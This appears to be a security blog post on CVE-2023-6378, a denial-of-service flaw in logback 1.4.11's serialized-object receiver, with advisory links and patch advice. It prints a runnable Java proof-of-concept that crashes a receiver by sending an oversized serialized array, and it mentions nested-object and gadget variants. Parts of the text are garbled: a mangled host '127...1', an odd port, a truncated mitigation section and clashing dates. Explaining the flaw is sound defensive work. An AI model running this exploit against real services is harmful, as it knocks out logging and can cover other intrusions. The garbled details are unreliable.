CVE CyberSecurity Database News

CVE-2023-6378 - Exploiting Logback Receiver’s Serialization Flaw (v1.4.11) for Denial-of-Service

Poster -

Published: June 2024
Author: Security Insights


Logback is one of the most popular Java logging frameworks—widely used in enterprise, open-source, and cloud-based projects. In December 2023, a critical vulnerability, CVE-2023-6378, was disclosed. This flaw centers around the logback receiver component, which, if not correctly secured, allows attackers to send specially crafted data leading to a Denial-of-Service (DoS).

In this post, we break down what the vulnerability is, how it works, show example code, and link to important resources.

What is CVE-2023-6378?

In logback version 1.4.11, the Receiver component uses Java's object serialization mechanism to receive and process log data over the network. Java serialization can be dangerous if untrusted data flows in: sending malicious (poisoned) serialized objects can cause memory exhaustion, infinite loops, application crashes, or even remote code execution (though in this case, DoS is the documented risk).

This particular CVE allows unauthenticated attackers to send a single malicious payload, halting the entire logging service, effectively cloaking attacks or just causing chaos.

Logback Issue Tracker:
- CVE-2023-6378 Logback Issue
- GitHub Advisory

How Does The Vulnerability Work?

The receiver component listens on a TCP port, waiting for log events—serialized as Java objects. Its default configuration reads and deserializes any incoming objects.

A simple attack: send a large, complex, or intentionally malformed serialized object to that socket. Deserialization can consume excessive memory or cycles—crashing the application.

PoC Exploit: How an Attacker Can Trigger DoS

Note: The following is an educational example. Only use it on systems you own!

Suppose you have logback’s SocketReceiver running on port 600.

Malicious Client Example (Java)

import java.io.ObjectOutputStream;
import java.net.Socket;

public class LogbackDoSAttack {
    public static void main(String[] args) throws Exception {
        // Configure target - change if needed
        String targetHost = "127...1";
        int port = 600;

        // Connect to Logback receiver
        Socket socket = new Socket(targetHost, port);
        ObjectOutputStream out = new ObjectOutputStream(socket.getOutputStream());

        // Create a purposely oversized Array to exhaust memory
        int[] hugeArray = new int[Integer.MAX_VALUE / 20];

        // Send as serialized object
        out.writeObject(hugeArray);
        out.flush();
        socket.close();

        System.out.println("Malicious payload sent!");
    }
}

This purposely sends an array so large that when the receiver begins to deserialize it, the JVM allocates gigabytes of memory — leading to OutOfMemoryError, application crash, and no more logging.

More advanced attacks could loop tons of recursively nested objects, trigger stack overflows, or even exploit gadgets if other libraries are on the classpath.

Set JVM memory and time limits for deserialization if possible.

Changelog Fix:
Release notes for v1.4.12 confirm the issue is patched.

References and More Reading

- Logback CVE-2023-6378 Advisory
- Logback Official Site
- Serious Java Deserialization Vulnerabilities

Summary

CVE-2023-6378 is a classic reminder: deserializing anything from the network is risky! If you use logback’s receiver, update immediately and lock down your logging endpoints. Even non-public servers can be at risk, especially if an insider turns bad.

If you’re tasked to secure or audit Java systems, always check for network-facing deserialization like this—and patch fast.

Timeline

Published on: 11/29/2023 12:15:07 UTC
Last modified on: 12/05/2023 21:00:10 UTC